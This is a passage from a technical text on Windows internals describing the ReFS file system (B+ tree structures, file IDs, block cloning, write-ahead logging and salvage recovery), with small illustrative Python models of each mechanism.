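A minimal model of the generational scheme (the structure and method names are invented): the generation number lets a page dirtied in the current generation be updated in place, while a page dirtied before an in-flight update must be copied on write.

```python
# Minimal, invented model of the generational scheme: a page dirtied
# in the current generation can be updated in place; a page dirtied
# before an in-flight tree update must be copied on write.

class GenerationalTree:
    def __init__(self):
        self.generation = 0
        self.dirty_in = {}       # page id -> generation it was dirtied in

    def dirty(self, page_id):
        # Returns True when a copy-on-write is required first, i.e. the
        # page was dirtied against an older generation.
        needs_cow = (page_id in self.dirty_in
                     and self.dirty_in[page_id] < self.generation)
        self.dirty_in[page_id] = self.generation
        return needs_cow

    def tree_update(self):
        # Failable phase (exclusive lock): bump the generation.
        self.generation += 1
        # Nonfailable phase (shared lock): write out pages belonging to
        # older generations; new writers proceed concurrently.
        written = [p for p, g in self.dirty_in.items() if g < self.generation]
        for p in written:
            del self.dirty_in[p]
        return written

tree = GenerationalTree()
tree.dirty('A')                # dirtied in generation 0
flushed = tree.tree_update()   # update in flight: generation is now 1
cow_needed = tree.dirty('B')   # a fresh page: no copy-on-write needed
```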
ReFS architecture
As already introduced in previous paragraphs, ReFS (the Resilient file system) is a hybrid of the NTFS
implementation and Minstore, where every file and directory is a B+ tree configured by a particular
schema. The file system volume is a flat namespace of directories. As discussed previously, NTFS is
composed of different components:
■ Core FS support: Describes the interface between the file system and other system components, like the cache manager and the I/O subsystem, and exposes the concept of file create, open, read, write, close, and so on.

■ High-level FS feature support: Describes the high-level features of a modern file system, like file compression, file links, quota tracking, reparse points, file encryption, recovery support, and so on.

■ On-disk dependent components and data structures: MFT and file records, clusters, index package, resident and nonresident attributes, and so on (see the “The NT file system (NTFS)” section earlier in this chapter for more details).
ReFS keeps the first two parts largely unchanged and replaces the rest of the on-disk dependent
components with Minstore, as shown in Figure 11-84.
FIGURE 11-84 ReFS architecture’s scheme.
In the “NTFS driver” section of this chapter, we introduced the entities that link a file handle to the
file system’s on-disk structure. In the ReFS file system driver, those data structures (the stream control
block, which represents the NTFS attribute that the caller is trying to read, and the file control block,
which contains a pointer to the file record in the disk’s MFT) are still valid, but have a slightly different meaning with respect to their underlying durable storage. The changes made to these objects go through
Minstore instead of being directly translated in changes to the on-disk MFT. As shown in Figure 11-85,
in ReFS:
■ A file control block (FCB) represents a single file or directory and, as such, contains a pointer to the Minstore B+ tree, a reference to the parent directory’s stream control block and key (the directory name). The FCB is pointed to by the file object, through the FsContext2 field.

■ A stream control block (SCB) represents an opened stream of the file object. The data structure used in ReFS is a simplified version of the NTFS one. When the SCB represents directories, though, the SCB has a link to the directory’s index, which is located in the B+ tree that represents the directory. The SCB is pointed to by the file object, through the FsContext field.

■ A volume control block (VCB) represents a currently mounted volume, formatted by ReFS. When a properly formatted volume has been identified by the ReFS driver, a VCB data structure is created, attached into the volume device object extension, and linked into a list located in a global data structure that the ReFS file system driver allocates at its initialization time. The VCB contains a table of all the directory FCBs that the volume has currently opened, indexed by their reference ID.
FIGURE 11-85 ReFS files and directories in-memory data structures.
In ReFS, every open file has a single FCB in memory that can be pointed to by different SCBs (depending on the number of streams opened). Unlike NTFS, where the FCB needs only to know the MFT
entry of the file to correctly change an attribute, the FCB in ReFS needs to point to the B+ tree that
represents the file record. Each row in the file’s B+ tree represents an attribute of the file, like the ID, full
name, extents table, and so on. The key of each row is the attribute code (an integer value).
File records are entries in the directory in which files reside. The root node of the B+ tree that represents a file is embedded into the directory entry’s value data and never appears in the object table. The
file data streams, which are represented by the extents table, are embedded B+ trees in the file record.
The extents table is indexed by range. This means that every row in the extent table has a VCN range
used as the row’s key, and the LCN of the file’s extent used as the row’s value. In ReFS, the extents table
could become very large (it is indeed a regular B+ tree). This allows ReFS to support huge files, bypassing the limitations of NTFS.
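The range-indexed extents table can be sketched with the example extents shown in Figure 11-86. The helper below resolves a virtual cluster number (VCN) to a logical cluster number (LCN), returning None for holes; the function name and table shape are invented for the sketch:

```python
# Sketch of the range-indexed extents table, using the example extents
# from Figure 11-86: each row's key is a VCN range and its value the
# starting LCN. Function name and table shape are invented.
import bisect

extents = [((0, 100), 5004), ((101, 200), 9550), ((300, 304), 1000)]

def vcn_to_lcn(table, vcn):
    starts = [first for (first, _last), _lcn in table]
    i = bisect.bisect_right(starts, vcn) - 1
    if i < 0:
        return None
    (first, last), lcn = table[i]
    if vcn > last:
        return None               # a hole in a sparse file
    return lcn + (vcn - first)

lcn = vcn_to_lcn(extents, 150)    # falls inside the second extent
```

Because the rows are keyed by range and kept sorted, the lookup is a binary search over extent starts rather than a scan, which is what keeps even enormous extents tables fast.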
Figure 11-86 shows the object table, files, directories, and the file extent table, which in ReFS are all
represented through B+ trees and provide the file system namespace.
FIGURE 11-86 Files and directories in ReFS.
Directories are Minstore B+ trees that are responsible for the single, flat namespace. A ReFS
directory can contain:
I
Files
I
Links to directories
I
Links to other files (file IDs)
Rows in the directory B+ tree are composed of a key/value pair, where the key is the entry’s name and the value depends on the type of directory entry. With the goal of supporting queries and other high-level semantics, Minstore also stores some internal data in invisible directory rows. These kinds of rows have their key starting with a Unicode zero character. Another row that is worth mentioning is the directory’s file row. Every directory has a record, and in ReFS that file record is stored as a file row in
the self-same directory, using a well-known zero key. This has some effect on the in-memory data struc-
tures that ReFS maintains for directories. In NTFS, a directory is really a property of a file record (through
the Index Root and Index Allocation attributes); in ReFS, a directory is a file record stored in the directory
itself (called directory index record). Therefore, whenever ReFS manipulates or inspects files in a directory,
it must ensure that the directory index is open and resident in memory. To be able to update the directory, ReFS stores a pointer to the directory’s index record in the opened stream control block.
The described configuration of the ReFS B+ trees does not solve an important problem. Every time
the system wants to enumerate the files in a directory, it needs to open and parse the B+ tree of each
file. This means that a lot of I/O requests to different locations in the underlying medium are needed.
If the medium is a rotational disk, the performance would be rather bad.
To solve the issue, ReFS stores a STANDARD_INFORMATION data structure in the root node of
the file’s embedded table (instead of storing it in a row of the child file’s B+ table). The STANDARD
_INFORMATION data includes all the information needed for the enumeration of a file (like the file’s
access time, size, attributes, security descriptor ID, the update sequence number, and so on). A file’s
embedded root node is stored in a leaf bucket of the parent directory’s B+ tree. By having the data
structure located in the file’s embedded root node, when the system enumerates files in a directory,
it only needs to parse entries in the directory B+ tree without accessing any B+ tables describing indi-
vidual files. The B+ tree that represents the directory is already in the page table, so the enumeration
is quite fast.
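This enumeration shortcut is easy to model. The Python sketch below is purely illustrative (the classes and fields are invented, not ReFS on-disk structures): because each directory row embeds the file's metadata, listing the directory never has to open a per-file table, so no extra simulated reads occur.

```python
# Illustrative model (not ReFS code) of enumeration over a directory
# whose rows embed each file's STANDARD_INFORMATION-like metadata.

class FileTable:
    """Stands in for a file's own B+ tree, stored elsewhere on disk."""
    def __init__(self, extents):
        self.extents = extents
        self.disk_reads = 0          # count simulated I/O

    def read(self):                  # would be needed only for data access
        self.disk_reads += 1
        return self.extents

class Directory:
    """A directory B+ tree: name -> (embedded metadata, file table)."""
    def __init__(self):
        self.rows = {}

    def add_file(self, name, size, extents):
        std_info = {"name": name, "size": size}   # embedded in the row
        self.rows[name] = (std_info, FileTable(extents))

    def enumerate(self):
        # Enumeration touches only directory rows: no per-file table
        # is opened, so no extra disk reads happen.
        return [info for info, _table in self.rows.values()]

d = Directory()
d.add_file("a.txt", 100, [(0, 4)])
d.add_file("b.txt", 200, [(5, 8)])
listing = d.enumerate()
assert [e["name"] for e in listing] == ["a.txt", "b.txt"]
assert all(t.disk_reads == 0 for _, t in d.rows.values())
```

The point of the model is the last assertion: the per-file tables were never read during enumeration.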
ReFS on-disk structure
This section describes the on-disk structure of a ReFS volume, similar to the previous NTFS section. The
section focuses on the differences between NTFS and ReFS and will not cover the concepts already
described in the previous section.
The Boot sector of a ReFS volume consists of a small data structure that, similar to NTFS, contains
basic volume information (serial number, cluster size, and so on), the file system identifier (the ReFS
OEM string and version), and the ReFS container size (more details are covered in the “Shingled mag-
netic recording (SMR) volumes” section later in the chapter). The most important data structure in the
volume is the volume super block. It contains the offset of the latest volume checkpoint records and
is replicated in three different clusters. ReFS, to be able to mount a volume, reads one of the volume
checkpoints, verifies and parses it (the checkpoint record includes a checksum), and finally gets the
offset of each global table.
The volume mounting process opens the object table and gets the needed information for reading
the root directory, which contains all of the directory trees that compose the volume namespace. The
object table, together with the container table, is indeed one of the most critical data structures that is
the starting point for all volume metadata. The container table exposes the virtualization namespace,
so without it, ReFS would not be able to correctly identify the final location of any cluster. Minstore
optionally allows clients to store information within its object table rows. The object table row values, as
shown in Figure 11-87, have two distinct parts: a portion owned by Minstore and a portion owned by
ReFS. ReFS stores parent information as well as a high watermark for USN numbers within a directory
(see the section “Security and change journal” later in this chapter for more details).
(Row fields: key = ObjectId; value = Last USN #, Parent object ID, Root location, Root checksum, Last written log #.)
FIGURE 11-87 The object table entry composed of a ReFS part (bottom rectangle) and Minstore part (top rectangle).
Object IDs
Another problem that ReFS needs to solve regards file IDs. For various reasons—primarily for tracking
and storing metadata about files in an efficient way without tying information to the namespace—
ReFS needs to support applications that open a file through their file ID (using the OpenFileById API, for
example). NTFS accomplishes this through the \$Extend\$ObjId file (using the $O index root attribute;
see the previous NTFS section for more details). In ReFS, assigning an ID to every directory is trivial;
indeed, Minstore stores the object ID of a directory in the object table. The problem arises when the
system needs to be able to assign an ID to a file; ReFS doesn’t have a central file ID repository like NTFS
does. To properly find a file ID located in a directory tree, ReFS splits the file ID space into two portions:
the directory and the file. The directory ID consumes the directory portion and is indexed into the key
of an object table’s row. The file portion is assigned out of the directory’s internal file ID space. An ID
that represents a directory usually has a zero in its file portion, but all files inside the directory share
the same directory portion. ReFS supports the concept of file IDs by adding a separate row (composed
of a <FileId, FileName> pair) in the directory's B+ tree, which maps the file ID to the file name within
the directory.
When the system is required to open a file located in a ReFS volume using its file ID, ReFS satisfies
the request by:
1. Opening the directory specified by the directory portion
2. Querying the FileId row in the directory B+ tree that has the key corresponding to the file portion
3. Querying the directory B+ tree for the file name found in the last lookup.
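The split ID and the lookup steps above can be sketched as follows. This is a hypothetical model, not the real on-disk format: the 64-bit halves, the row keys, and the dictionary-based tables are all assumptions made for illustration.

```python
# Hypothetical sketch of a ReFS-style file ID, split into a directory
# portion and a file portion, plus the three-step open-by-ID lookup.

def make_file_id(directory_id, file_part):
    return (directory_id << 64) | file_part     # assume 64-bit halves

def split_file_id(file_id):
    return file_id >> 64, file_id & ((1 << 64) - 1)

# object table: directory ID -> directory B+ tree (a dict here)
object_table = {
    5: {                                  # directory with ID 5
        ("fileid", 1): "report.docx",     # FileId row: file part -> name
        ("name", "report.docx"): {"size": 4096},
    }
}

def open_by_id(file_id):
    dir_id, file_part = split_file_id(file_id)
    directory = object_table[dir_id]            # step 1: open directory
    name = directory[("fileid", file_part)]     # step 2: FileId row
    return directory[("name", name)]            # step 3: file row by name

fid = make_file_id(5, 1)
assert open_by_id(fid) == {"size": 4096}
```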
Careful readers may have noted that the algorithm does not explain what happens when a file is re-
named or moved. The ID of a renamed file should be the same as its previous location, even if the ID of
the new directory is different in the directory portion of the file ID. ReFS solves the problem by replac-
ing the original file ID entry, located in the old directory B+ tree, with a new “tombstone” entry, which,
instead of specifying the target file name in its value, contains the new assigned ID of the renamed file
(with both the directory and the file portion changed). Another new File ID entry is also allocated in the
new directory B+ tree, which allows assigning the new local file ID to the renamed file. If the file is then
moved to yet another directory, the second directory has its ID entry deleted because it’s no longer
needed; one tombstone, at most, is present for any given file.
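A minimal sketch of the tombstone mechanism, with invented row formats, might look like this:

```python
# Illustrative model (not ReFS code) of renaming a file across
# directories: the old FileId row becomes a tombstone that redirects
# to the newly assigned ID in the target directory.

directories = {
    1: {("fileid", 7): {"kind": "name", "name": "old.txt"}},
    2: {},
}

def move_file(src_dir, src_file_part, dst_dir, dst_file_part, name):
    # Replace the original FileId row with a tombstone pointing at the
    # new ID, and add a regular FileId row in the target directory.
    directories[src_dir][("fileid", src_file_part)] = {
        "kind": "tombstone", "new_id": (dst_dir, dst_file_part)}
    directories[dst_dir][("fileid", dst_file_part)] = {
        "kind": "name", "name": name}

def resolve(dir_id, file_part):
    row = directories[dir_id][("fileid", file_part)]
    if row["kind"] == "tombstone":            # follow at most one hop
        dir_id, file_part = row["new_id"]
        row = directories[dir_id][("fileid", file_part)]
    return row["name"]

move_file(1, 7, 2, 3, "old.txt")
assert resolve(1, 7) == "old.txt"   # old ID still resolves via tombstone
assert resolve(2, 3) == "old.txt"
```

The old (directory, file) ID keeps resolving after the move because the tombstone redirects to the newly assigned ID, which matches the behavior described above.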
Security and change journal
The mechanics of supporting Windows object security in the file system lie mostly in the higher components, which are implemented by portions of the file system that have remained unchanged since NTFS. The
underlying on-disk implementation has been changed to support the same set of semantics. In ReFS,
object security descriptors are stored in the volume’s global security directory B+ table. A hash is com-
puted for every security descriptor in the table (using a proprietary algorithm, which operates only on
self-relative security descriptors), and an ID is assigned to each.
When the system attaches a new security descriptor to a file, the ReFS driver calculates the secu-
rity descriptor’s hash and checks whether it’s already present in the global security table. If the hash is
present in the table, ReFS resolves its ID and stores it in the STANDARD_INFORMATION data structure
located in the embedded root node of the file’s B+ tree. In case the hash does not already exist in the
global security table, ReFS executes a similar procedure but first adds the new security descriptor in the
global B+ tree and generates its new ID.
The rows of the global security table are of the format <hash, ID, security descriptor, ref. count>,
where the hash and the ID are as described earlier, the security descriptor is the raw byte payload of
the security descriptor itself, and ref. count is a rough estimate of how many objects on the volume are
using the security descriptor.
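The dedup-by-hash flow can be modeled briefly. Note that the real table uses a proprietary hash over self-relative security descriptors; the SHA-256 below is only a stand-in, and the table layout is simplified:

```python
# Simplified model of hash-based security descriptor deduplication.
import hashlib

security_table = {}          # hash -> [id, descriptor bytes, ref_count]
next_id = [1]

def attach_descriptor(sd_bytes):
    h = hashlib.sha256(sd_bytes).hexdigest()   # stand-in for the real hash
    row = security_table.get(h)
    if row is None:                       # first use: insert a new row
        row = [next_id[0], sd_bytes, 0]
        next_id[0] += 1
        security_table[h] = row
    row[2] += 1                           # rough reference count
    return row[0]       # the ID stored in the file's STANDARD_INFORMATION

a = attach_descriptor(b"O:BAG:BAD:(A;;FA;;;WD)")
b = attach_descriptor(b"O:BAG:BAD:(A;;FA;;;WD)")   # same descriptor
c = attach_descriptor(b"O:BAG:BAD:(A;;FR;;;WD)")   # different one
assert a == b and a != c
assert len(security_table) == 2
```

Identical descriptors map to a single table row and a single ID, so the per-file cost is just the small ID.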
As described in the previous section, NTFS implements a change journal feature, which provides ap-
plications and services with the ability to query past changes to files within a volume. ReFS implements
an NTFS-compatible change journal, albeit realized in a slightly different way. The ReFS journal stores
change entries in the change journal file located in another volume’s global Minstore B+ tree, the
metadata directory table. ReFS opens and parses the volume’s change journal file only once the vol-
ume is mounted. The maximum size of the journal is stored in the USN_MAX attribute of the journal
file. In ReFS, each file and directory contains its last USN (update sequence number) in the STANDARD_
INFORMATION data structure stored in the embedded root node of the parent directory. Through the
journal file and the USN number of each file and directory, ReFS can provide the three FSCTLs used for
reading and enumerating the volume journal file:
■ FSCTL_READ_USN_JOURNAL: Reads the USN journal directly. Callers specify the journal ID they're reading and the number of the USN record they expect to read.
■ FSCTL_READ_FILE_USN_DATA: Retrieves the USN change journal information for the specified file or directory.
■ FSCTL_ENUM_USN_DATA: Scans all the file records and enumerates only those that have last
updated the USN journal with a USN record whose USN is within the range specified by the
caller. ReFS can satisfy the query by scanning the object table, then scanning each directory
referred to by the object table, and returning the files in those directories that fall within the
timeline specified. This is slow because each directory needs to be opened, examined, and so
on. (Directories’ B+ trees can be spread across the disk.) The way ReFS optimizes this is that it
stores the highest USN of all files in a directory in that directory’s object table entry. This way,
ReFS can satisfy this query by visiting only directories it knows are within the range specified.
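The pruning described in the last bullet can be sketched as a simple filter over hypothetical object table entries (the per-directory max_usn field below stands in for the highest USN stored in the directory's object table entry):

```python
# Sketch of the FSCTL_ENUM_USN_DATA optimization: directories whose
# highest recorded USN is below the queried range are never opened.
# All structures and names here are invented for illustration.

object_table = {
    "dirA": {"max_usn": 120, "files": {"a.txt": 100, "b.txt": 120}},
    "dirB": {"max_usn": 40,  "files": {"c.txt": 40}},
    "dirC": {"max_usn": 300, "files": {"d.txt": 250, "e.txt": 300}},
}

def enum_usn_data(low, high):
    hits, dirs_opened = [], 0
    for name, entry in object_table.items():
        if entry["max_usn"] < low:        # prune: nothing can be in range
            continue
        dirs_opened += 1                  # only now open the directory
        hits += [f for f, usn in entry["files"].items()
                 if low <= usn <= high]
    return hits, dirs_opened

files, opened = enum_usn_data(200, 400)
assert files == ["d.txt", "e.txt"]
assert opened == 1          # dirA and dirB were skipped entirely
```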
ReFS advanced features
In this section, we describe the advanced features of ReFS, which explain why the ReFS file system is a
better fit for large server systems like the ones used in the infrastructure that provides the Azure cloud.
File’s block cloning (snapshot support) and sparse VDL
Traditionally, storage systems implement snapshot and clone functionality at the volume level (see
dynamic volumes, for example). In modern datacenters, when hundreds of virtual machines run and
are stored on a unique volume, such techniques are no longer able to scale. One of the original goals of
the ReFS design was to support file-level snapshots and scalable cloning support (a VM typically maps
to one or a few files in the underlying host storage), which meant that ReFS needed to provide a fast
method to clone an entire file or even only chunks of it. Cloning a range of blocks from one file into a
range of another file allows not only file-level snapshots but also finer-grained cloning for applications
that need to shuffle blocks within one or more files. VHD diff-disk merge is one example.
ReFS exposes the new FSCTL_DUPLICATE_EXTENTS_TO_FILE to duplicate a range of blocks from
one file into another range of the same file or to a different file. Subsequent to the clone operation,
writes into cloned ranges of either file will proceed in a write-to-new fashion, preserving the cloned
block. When there is only one remaining reference, the block can be written in place. The source and
target file handles, along with the details of the clone operation (which blocks to clone from the source
and the target range), are provided as parameters.
As already seen in the previous section, ReFS indexes the LCNs that make up the file’s data stream
into the extent index table, an embedded B+ tree located in a row of the file record. To support block
cloning, Minstore uses a new global index B+ tree (called the block count reference table) that tracks the
reference counts of every extent of blocks that are currently cloned. The index starts out empty. The
first successful clone operation adds one or more rows to the table, indicating that the blocks now have
a reference count of two. If one of the views of those blocks were to be deleted, the rows would be
removed. This index is consulted in write operations to determine if write-to-new is required or if write-
in-place can proceed. It’s also consulted before marking free blocks in the allocator. When freeing
clusters that belong to a file, the reference count of the cluster range is decremented. If the reference
count in the table reaches zero, the space is actually marked as freed.
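A compact model of the write-in-place versus write-to-new decision, with a naive allocator and single-cluster extents standing in for the real structures:

```python
# Illustrative copy-on-write model (not ReFS code): a block reference
# count table decides whether a write must go to a new location.

refcount = {}                 # cluster -> count; absent means 1 (unshared)
next_free = [100]             # naive allocator for new clusters

def clone(extents):
    for c in extents:
        refcount[c] = refcount.get(c, 1) + 1
    return list(extents)      # the clone shares the same clusters

def write(extents, index):
    c = extents[index]
    if refcount.get(c, 1) > 1:            # shared: write-to-new
        refcount[c] -= 1
        if refcount[c] == 1:
            del refcount[c]               # back to the "unshared" default
        new_c = next_free[0]; next_free[0] += 1
        extents[index] = new_c
    # else: only one reference exists, so write-in-place is safe
    return extents[index]

file1 = [10, 11]
file2 = clone(file1)
assert refcount == {10: 2, 11: 2}
target = write(file2, 0)      # CoW: file2 gets a fresh cluster
assert target == 100 and file1[0] == 10
assert 10 not in refcount     # cluster 10 is back to a single reference
```

As in the description above, the table starts empty, grows on clone, and rows disappear again once only one reference remains.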
Figure 11-88 shows an example of file cloning. After cloning an entire file (File 1 and File 2 in the pic-
ture), both files have identical extent tables, and the Minstore block count reference table shows two
references to both volume extents.
FIGURE 11-88 Cloning an ReFS file.
Minstore automatically merges rows in the block reference count table whenever possible with
the intention of reducing the size of the table. In Windows Server 2016, HyperV makes use of the
new cloning FSCTL. As a result, the duplication of a VM, and the merging of its multiple snapshots,
is extremely fast.
ReFS supports the concept of a file Valid Data Length (VDL), in a similar way to NTFS. Using the
ZeroRangeInStream file data stream, ReFS keeps track of the valid or invalid state for each allocated
file’s data block. All the new allocations requested to the file are in an invalid state; the first write to the
file makes the allocation valid. ReFS returns zeroed content to read requests from invalid file ranges.
The technique is similar to the DAL, which we explained earlier in this chapter. Applications can logically
zero a portion of file without actually writing any data using the FSCTL_SET_ZERO_DATA file system
control code (the feature is used by HyperV to create fixed-size VHDs very quickly).
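A toy model of this valid/invalid tracking (not ReFS code; the block size and all structures are invented):

```python
# Per-block valid/invalid state: reads from invalid, never-written
# blocks return zeros, and logically zeroing a range only marks the
# blocks invalid, without writing any data to the medium.

BLOCK = 4   # bytes per block, arbitrarily small for the example

class SparseFile:
    def __init__(self):
        self.blocks = {}                  # index -> bytes; absent = invalid

    def write(self, index, data):
        self.blocks[index] = data         # the first write makes a block valid

    def read(self, index):
        return self.blocks.get(index, b"\x00" * BLOCK)

    def zero_range(self, start, end):     # FSCTL_SET_ZERO_DATA analogue
        for i in range(start, end):
            self.blocks.pop(i, None)      # nothing is written to disk

f = SparseFile()
f.write(2, b"DATA")
assert f.read(2) == b"DATA"
assert f.read(5) == b"\x00" * BLOCK       # invalid range reads as zeros
f.zero_range(0, 8)
assert f.read(2) == b"\x00" * BLOCK       # logically zeroed, instantly
```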
EXPERIMENT: Witnessing ReFS snapshot support through HyperV
In this experiment, you’re going to use HyperV for testing the volume snapshot support of ReFS.
Using the HyperV manager, you need to create a virtual machine and install any operating
system on it. At the first boot, take a checkpoint on the VM by right-clicking the virtual machine
name and selecting the Checkpoint menu item. Then, install some applications on the virtual
machine (the example below shows a Windows Server 2012 machine with Office installed) and
take another checkpoint.
If you turn off the virtual machine and, using File Explorer, locate where the virtual hard disk
file resides, you will find the virtual hard disk and multiple other files that represent the differen-
tial content between the current checkpoint and the previous one.
If you open the HyperV Manager again and delete the entire checkpoint tree (by right-
clicking the first root checkpoint and selecting the Delete Checkpoint Subtree menu item), you
will find that the entire merge process takes only a few seconds. This is explained by the fact that
HyperV uses the block-cloning support of ReFS, through the FSCTL_DUPLICATE_EXTENTS_TO_FILE
I/O control code, to properly merge the checkpoints’ content into the base virtual hard disk file.
As explained in the previous paragraphs, block cloning doesn’t actually move any data. If you
repeat the same experiment with a volume formatted using an exFAT or NTFS file system, you will
find that the time needed to merge the checkpoints is much larger.
ReFS write-through
One of the goals of ReFS was to provide close to zero unavailability due to file system corruption. In
the next section, we describe all of the available online repair methods that ReFS employs to recover
from disk damage. Before describing them, it’s necessary to understand how ReFS implements write-
through when it writes the transactions to the underlying medium.
The term write-through refers to any primitive modifying operation (for example, create file, extend
file, or write block) that must not complete until the system has made a reasonable guarantee that the
results of the operation will be visible after crash recovery. Write-through performance is critical for dif-
ferent I/O scenarios, which can be broken into two kinds of file system operations: data and metadata.
When ReFS performs an update-in-place to a file without requiring any metadata mutation (like
when the system modifies the content of an already-allocated file, without extending its length), the
write-through performance has minimal overhead. Because ReFS uses allocate-on-write for metadata,
it’s expensive to give write-through guarantees for other scenarios when metadata change. For ex-
ample, ensuring that a file has been renamed implies that the metadata blocks from the root of the file
system down to the block describing the file’s name must be written to a new location. The allocate-
on-write nature of ReFS has the property that it does not modify data in place. One implication of this
is that recovery of the system should never have to undo any operations, in contrast to NTFS.
To achieve write-through, Minstore uses write-ahead-logging (or WAL). In this scheme, shown in
Figure 11-89, the system appends records to a log that is logically infinitely long; upon recovery, the
log is read and replayed. Minstore maintains a log of logical redo transaction records for all tables
except the allocator table. Each log record describes an entire transaction, which has to be replayed at
recovery time. Each transaction record has one or more operation redo records that describe the actual
high-level operation to perform (such as insert key K / value V pair in Table X). The transaction record
allows recovery to separate transactions and is the unit of atomicity (no transactions will be partially re-
done). Logically, logging is owned by every ReFS transaction; a small log buffer contains the log record.
If the transaction is committed, the log buffer is appended to the in-memory volume log, which will
be written to disk later; otherwise, if the transaction aborts, the internal log buffer will be discarded.
Write-through transactions wait for confirmation from the log engine that the log has committed up
until that point, while non-write-through transactions are free to continue without confirmation.
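The commit/abort/replay scheme can be reduced to a few lines. This sketch models only the logic just described; the record formats and the log engine are, of course, far simpler here than in the real implementation:

```python
# Minimal write-ahead-logging model: per-transaction redo records are
# buffered, appended to the volume log on commit, discarded on abort,
# and replayed in order at recovery time.

volume_log = []                 # the durable, append-only log

class Transaction:
    def __init__(self):
        self.buffer = []        # small per-transaction log buffer

    def insert(self, table, key, value):
        self.buffer.append(("insert", table, key, value))

    def commit(self):
        volume_log.append(list(self.buffer))   # one atomic record

    def abort(self):
        self.buffer.clear()                    # nothing reaches the log

def recover(log):
    tables = {}
    for txn in log:             # replay whole transactions only
        for op, table, key, value in txn:
            tables.setdefault(table, {})[key] = value
    return tables

t1 = Transaction(); t1.insert("X", "K", "V"); t1.commit()
t2 = Transaction(); t2.insert("X", "K2", "V2"); t2.abort()
state = recover(volume_log)
assert state == {"X": {"K": "V"}}   # aborted work was never logged
```

Because each log record holds a whole transaction, recovery never redoes a transaction partially, which is exactly the unit-of-atomicity property described above.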
FIGURE 11-89 Scheme of Minstore’s write-ahead logging.
Furthermore, ReFS makes use of checkpoints to commit some views of the system to the underlying
disk, consequently rendering some of the previously written log records unnecessary. A transaction’s
redo log records no longer need to be redone once a checkpoint commits a view of the affected trees
to disk. This implies that the checkpoint will be responsible for determining the range of log records
that can be discarded by the log engine.
ReFS recovery support
To properly keep the file system volume available at all times, ReFS uses different recovery strategies.
While NTFS has similar recovery support, the goal of ReFS is to get rid of any offline check disk utilities
(like the Chkdsk tool used by NTFS) that can take many hours to execute in huge disks and require the
operating system to be rebooted. There are mainly four ReFS recovery strategies:
■ Metadata corruption is detected via checksums and error-correcting codes. Integrity streams validate and maintain the integrity of the file's data using a checksum of the file's actual content (the checksum is stored in a row of the file's B+ tree table), which maintains the integrity of the file itself and not only its file-system metadata.
■ ReFS intelligently repairs any data that is found to be corrupt, as long as another valid copy is available. Other copies might be provided by ReFS itself (which keeps additional copies of its own metadata for critical structures such as the object table) or through the volume redundancy provided by Storage Spaces (see the "Storage Spaces" section later in this chapter).
■ ReFS implements the salvage operation, which removes corrupted data from the file system namespace while it's online.
■ ReFS rebuilds lost metadata via best-effort techniques.
The first and second strategies are properties of the Minstore library on which ReFS depends (more
details about the integrity streams are provided later in this section). The object table and all the global
Minstore B+ tree tables contain a checksum for each link that points to the child (or director) nodes
stored in different disk blocks. When Minstore detects that a block is not what it expects, it automati-
cally attempts repair from one of its duplicated copies (if available). If the copy is not available, Minstore
returns an error to the ReFS upper layer. ReFS responds to the error by initializing online salvage.
The term salvage refers to any fixes needed to restore as much data as possible when ReFS detects
metadata corruption in a directory B+ tree. Salvage is the evolution of the zap technique. The goal of
the zap was to bring back the volume online, even if this could lead to the loss of corrupted data. The
technique removed all the corrupted metadata from the file namespace, which then became available
after the repair.
Assume that a director node of a directory B+ tree becomes corrupted. In this case, the zap opera-
tion will fix the parent node, rewriting all the links to the child and rebalancing the tree, but the data
originally pointed by the corrupted node will be completely lost. Minstore has no idea how to recover
the entries addressed by the corrupted director node.
To solve this problem and properly restore the directory tree in the salvage process, ReFS needs
to know subdirectories’ identifiers, even when the directory table itself is not accessible (because it
has a corrupted director node, for example). Restoring part of the lost directory tree is made possible
by the introduction of a volume global table, called the parent-child table, which provides a
directory’s information redundancy.
A key in the parent–child table represents the parent table’s ID, and the data contains a list of child
table IDs. Salvage scans this table, reads the child tables list, and re-creates a new non-corrupted B+
tree that contains all the subdirectories of the corrupted node. In addition to needing child table IDs, to
completely restore the corrupted parent directory, ReFS still needs the name of the child tables, which
were originally stored in the keys of the parent B+ tree. The child table has a self-record entry with this
information (of type link to directory; see the previous section for more details). The salvage process
opens the recovered child table, reads the self-record, and reinserts the directory link into the parent
table. The strategy allows ReFS to recover all the subdirectories of a corrupted director or root node
(but still not the files). Figure 11-90 shows an example of zap and salvage operations on a corrupted
root node representing the Bar directory. With the salvage operation, ReFS is able to quickly bring the
file system back online and loses only two files in the directory.
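The salvage step that rebuilds subdirectory links can be sketched like this (the tables are plain dictionaries standing in for Minstore B+ trees):

```python
# Illustrative salvage model: even with the parent directory's B+ tree
# corrupted, the parent-child table lists the child tables, and each
# child's self-record supplies its name, so links can be reinserted.

parent_child = {"Bar": ["Subdir1"]}            # parent ID -> child IDs
child_tables = {"Subdir1": {"self_record": {"name": "Subdir1"}}}

def salvage(corrupted_dir_id):
    rebuilt = {}                               # new, non-corrupted tree
    for child_id in parent_child.get(corrupted_dir_id, []):
        child = child_tables[child_id]
        name = child["self_record"]["name"]    # read the self-record
        rebuilt[name] = child_id               # reinsert directory link
    return rebuilt       # subdirectories recovered; plain files are lost

new_bar = salvage("Bar")
assert new_bar == {"Subdir1": "Subdir1"}
```

As in the figure's example, the subdirectory survives the rebuild while the files that lived directly in the corrupted node do not.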
FIGURE 11-90 Comparison between the zap and salvage operations.
The ReFS file system, after salvage completes, tries to rebuild missing information using various
best-effort techniques; for example, it can recover missing file IDs by reading the information from
other buckets (thanks to the collating rule that separates files’ IDs and tables). Furthermore, ReFS also
augments the Minstore object table with a little bit of extra information to expedite repair. Although
ReFS has these best-effort heuristics, it’s important to understand that ReFS primarily relies on the re-
dundancy provided by metadata and the storage stack in order to repair corruption without data loss.
In the very rare cases in which critical metadata is corrupted, ReFS can mount the volume in read-only
mode, though not for every kind of corruption. For example, if the container table and all of its
duplicates were corrupted, the volume wouldn't be mountable even in read-only mode. By skipping
over the corrupted tables, the file system can simply ignore such global tables (like the allocator,
for example), while still maintaining a chance for the user to recover her data.
Finally, ReFS also supports file integrity streams, where a checksum is used to guarantee the integrity
of a file’s data (and not only of the file system’s metadata). For integrity streams, ReFS stores the checksum
of each run that composes the file’s extent table (the checksum is stored in the data section of an extent
table’s row). The checksum allows ReFS to validate the integrity of the data before accessing it. Before
returning any data that has integrity streams enabled, ReFS will first calculate its checksum and compare
it to the checksum contained in the file metadata. If the checksums don’t match, then the data is corrupt.
The ReFS file system exposes the FSCTL_SCRUB_DATA control code, which is used by the scrubber
(also known as the data integrity scanner). The data integrity scanner is implemented in the Discan.dll
library and is exposed as a task scheduler task, which executes at system startup and every week. When
